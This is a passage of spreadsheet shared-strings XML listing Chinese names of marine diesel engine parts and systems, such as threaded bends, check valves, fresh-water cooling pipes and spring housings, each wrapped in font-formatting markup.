      <t>带螺纹曲管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺纹弯管，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>90</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>度</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带密封环的转子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带钼涂层的活塞裙</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带内螺纹的圆柱销</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带桥控的控制设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带球压力螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带驱动的燃油喷射泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带驱动装置的三通阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带软管的挠性钢管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带示功器的连接块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带手柄的三通考克</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带数据板的弹簧</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带双接头的软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带伺服活塞的输出轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带锁环螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带套筒和螺母的长螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带填充塞的法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带调节环的两半护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带调节器的蝶阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带调速器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带铜环的环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带头直式短管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带凸轮的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>M.O.P</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带推力凸轮轴段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带弯曲插头旋塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带销的活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带小齿轮的油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带蓄压器的燃油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带压力表管组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带液位开关的放泄箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带有传动装置的滑油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带有过滤毡的消声器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带有联轴器法兰的联轴器法兰箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带整体润滑系统主机滑油管清洁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带整体润滑系统主机外循环油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带证书的焊接法兰</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带支架的滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带执行器的球阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带止动可调弯曲联轴器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带终端箱的仪表盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带轴承齿轮箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带轴承的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Flexstar</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带轴承的框架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带轴支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带柱塞的泵壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带转孔的圆螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带座交流电机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带座连接螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单侧托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单头开口扳手</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀，外螺纹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀调节</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向止回阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水板式冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水泵技术数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水出口挡块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水出口管系集</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水出口管装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水出口集管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水放泄支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动力涡轮机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水管进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水管可移动支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水管支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水进</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水进口主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却单元管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却水系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主要及辅助系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却水主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水排放管系布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水排放管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水温控阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水系统处理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水系统予热器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水系统预热器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水泄放管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水泄放漏斗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧，压力阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧阀膜片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧钢</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧加载杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧加载拉杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧夹具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧壳体，安全阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧壳体，起动阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧壳体，燃油阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧壳体，示功器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧壳体检查工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧数据板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧锁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
